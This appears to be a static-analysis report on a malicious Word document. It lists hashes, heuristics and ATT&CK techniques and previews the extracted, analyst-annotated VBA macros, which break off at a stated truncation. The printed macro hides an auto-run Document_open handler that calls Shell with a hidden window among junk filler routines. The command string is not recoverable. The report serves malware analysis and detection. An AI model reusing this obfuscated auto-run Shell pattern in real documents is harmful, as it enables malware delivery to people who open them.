Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5bca142b7c8343cb…

MALICIOUS

Office (OLE)

170.5 KB Created: 2018-07-23 13:37:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: bcda82eaabef24b6a797a78996fccbb5 SHA-1: f7253802d426940056ba1f08899cd23241145cee SHA-256: 5bca142b7c8343cbc243c7269aaa1d8dea67a5ceddb79b55b0c15cea462d1391
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample contains VBA macros, including a Document_Open macro, and a critical heuristic firing for Shell() calls within the VBA code. This indicates the macro is designed to execute an operating-system command automatically when the document is opened. The ClamAV detection name 'Doc.Malware.Valyria-6989445-0' further confirms its malicious nature. The macro's intent is likely to download and execute a second-stage payload, a common technique for malware delivery.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-6989445-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6989445-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 25218 bytes
SHA-256: 036e8c13853aaeb244d069d2469e893be2ee1a95ebe67fa07a23d0df844c8a44
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "hzqoUrQTfEOO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: module attributes as exported by olevba. VB_Base = "1Normal.ThisDocument"
' with VB_PredeclaredId = True indicates this is the document's ThisDocument class module,
' which is why the Document_open handler further down runs automatically when the file
' is opened. The module name is a random-looking string, consistent with the rest of the
' obfuscation in this listing.
' Analyst note: filler routine. Each If compares two names that are never assigned
' anywhere in the visible listing (there is no Option Explicit, so they are implicit
' Variants) and stores the same constant into another name that nothing reads.
' The function name is never assigned, so no meaningful value is returned, and
' nothing in the visible listing calls this routine. On Error Resume Next suppresses
' any runtime error arising from the undefined operands.
Private Function rjDMdTWbjwIsI()
On Error Resume Next
   If PoXtj Xor zVwMz Then
      zTTfz = 134100329
   End If
   If djYPSS Xor aftIUZ Then
      zXJji = 134100329
   End If
   If SPczw Xor hWjlb Then
      OsXiT = 134100329
   End If
   If rKHzjz Xor IPRLV Then
      qbrYF = 134100329
   End If
   If lUbnsX Xor zvJwPW Then
      lVQQl = 134100329
   End If
End Function
' Analyst note: same filler pattern as rjDMdTWbjwIsI — five conditionals on names
' that are never assigned in the visible listing, each writing the constant 134100329
' to an unused name. The function name is never assigned and nothing in the visible
' listing calls it; On Error Resume Next hides errors from the undefined operands.
Private Function ZDNfTBnRmYIi()
On Error Resume Next
   If qSQqjc Xor zpjSW Then
      SbFEV = 134100329
   End If
   If aNdMw Xor UphTmT Then
      YzvFXF = 134100329
   End If
   If GSdnq Xor JiOcfK Then
      qdszW = 134100329
   End If
   If iMDTLo Xor JzkEjV Then
      TvAZF = 134100329
   End If
   If QrWKSi Xor UtXGfj Then
      Itqcp = 134100329
   End If
End Function
' Analyst note: filler routine (six conditionals this time) identical in shape to the
' two above: Xor of two names never assigned in the visible listing, then a constant
' stored into an unused name. No return value is set and no visible caller exists.
Private Function ZNGSwzA()
On Error Resume Next
   If qukql Xor jlfvOK Then
      MzLGS = 134100329
   End If
   If aIUFM Xor EzqtN Then
      dOYXH = 134100329
   End If
   If OnwIb Xor wFJKB Then
      IbRGcH = 134100329
   End If
   If lCGcPM Xor fkwcc Then
      RnLXu = 134100329
   End If
   If ZSjdO Xor jwwhvo Then
      dqSdAs = 134100329
   End If
   If Nvopu Xor oMIvP Then
      FzvDT = 134100329
   End If
End Function
' Analyst note: auto-run entry point. VBA event names are case-insensitive, so
' Document_open is the Document_Open handler and runs when the document is opened
' (this is the OLE_VBA_DOCOPEN finding in the report). The only operative statement
' is the VBA.Shell call in the middle; the If blocks around it use the same filler
' pattern as the other routines in this module (compare two undefined names, multiply
' another undefined name by a constant, store into a name nothing reads) and are
' there to bury the one real line.
Private Sub Document_open()
On Error Resume Next
   If fAtJvq = PNFHCq Then
      VWXIAw = ITSti * 102768365
   End If
   If pMbksN = pjUwi Then
      Alajw = HorPAI * 102768365
   End If
   If zopTU = YcEDuu Then
      LYlwbo = lmwcL * 102768365
   End If
   If jwjjk = hiTPk Then
      Ajwjt = rTHjP * 102768365
   End If
' Operative line (OLE_VBA_SHELL): the command string is built by concatenating ten
' names that are not assigned anywhere in the visible listing plus the literal "C"
' (via CVar("C")), and passed to Shell with window style 0 (vbHide), so the spawned
' process gets no visible window. Because the pieces are not present in this excerpt,
' the exact command is not recoverable from it alone; presumably they are populated
' elsewhere (another module, document properties or form controls) — TODO confirm
' against the full olevba output. With On Error Resume Next, a failing Shell is
' silently ignored. Detection angle: a child process spawned by the Word process
' shortly after this document is opened.
VBA.Shell "" + hbQRFPaAiW + pjqCJRbMXsm + CVar("C") + drzwabQriIFDhd + kwJlESIBNrr + BonnVRGw + tWEtX + uZruUPj + dYNsMHc + fUTKiDjEVNPnr, 0
   If DNTYE = jVUhlJ Then
      bDdjj = SLZEMP * 102768365
   End If
   If udIGI = UmUUSz Then
      KmDpf = BTLbb * 102768365
   End If
   If uAAPml = pznEM Then
      wzwcst = dSkfE * 102768365
   End If
End Sub
' Analyst note: filler routine using the second junk pattern seen in Document_open:
' an equality test on two names never assigned in the visible listing, then an unused
' name set to another undefined name times 102768365. The function name is never
' assigned and nothing in the visible listing calls it.
Private Function BcPUKmRL()
On Error Resume Next
   If ZGthW = rFpzY Then
      WiAwY = XknzjA * 102768365
   End If
   If hvjUMf = KtVErO Then
      zhzAjB = mmSTKF * 102768365
   End If
   If kiiYqW = EOaWj Then
      GUOun = tNhFj * 102768365
   End If
   If uIQBC = dCfNFQ Then
      mQtQs = DPMmL * 102768365
   End If
   If NHwaN = jnhHj Then
      RaAGKN = VdoQc * 102768365
   End If
End Function
' Analyst note: filler routine, same shape as BcPUKmRL (equality on undefined names,
' unused assignment of an undefined name times 102768365). No return value is set
' and no caller appears in the visible listing.
Private Function SanpbjzMTYiN()
On Error Resume Next
   If iWsCa = ZmaUAj Then
      GjWZu = cMlqiD * 102768365
   End If
   If KiscXq = HJujq Then
      mbXcJ = wwMAcT * 102768365
   End If
   If bbFpj = HYhzkv Then
      TiFrD = ukFqZ * 102768365
   End If
   If jwiQIp = wGYpz Then
      vHtWYQ = VnvHS * 102768365
   End If
   If LBlFjz = fhAEt Then
      aLQtJ = fMkwwZ * 102768365
   End If
End Function
' Analyst note: last filler routine of this module, same shape as BcPUKmRL and
' SanpbjzMTYiN. Nothing here is reachable from, or contributes to, the Shell call
' in Document_open as far as the visible listing shows.
Private Function QjDZuASz()
On Error Resume Next
   If ildsRJ = nfRmoR Then
      OnYUKo = okqQtj * 102768365
   End If
   If jDRoz = UqnQS Then
      QIPMol = WsQXvb * 102768365
   End If
   If PvuXPF = cFkiJ Then
      TzwXK = mijcT * 102768365
   End If
   If TPjVNd = vMjLhA Then
      QdFszv = hmoED * 102768365
   End If
   If ZdGElr = slGvnj Then
      KdjrX = uKiMh * 102768365
   End If
End Function


Attribute VB_Name = "RWkfRXKkffYmW"
' Analyst note: start of a second module in the same extracted macros.bas. Its routines
' (nESfuLiw follows, cut off by the preview truncation) use a further filler pattern —
' For loops over a very large range with arithmetic on undefined names — rather than
' anything that feeds the Shell call in the first module.
Private Function nESfuLiw()
On Error Resume Next
   If cEJaZz = Wmdstw Then
      For vIhnTc = 155 To 516331127
         nAHOY = 21658 + uEDztO / (46281 * DsjdwS * 67395 * FuqfQ)
      Next
      Else
      TtHBr = (DCLAml / hasAkS)
   End If
   If qQHTPD = vkNlu Then
      For EjONfj = 155 To 516331127
         pfiAK = 38586 + CJEloB / (45648 * OAWOZL * 56615 * zwlzN)
      Next
      Else
      XVXKO = (KmHIvH / mjbws)
   End If
   If iMzCM = DHmMB Then
      For wjEqJ = 155 To 516331127
         SAqXC = 31756 + koKVD 
... (truncated)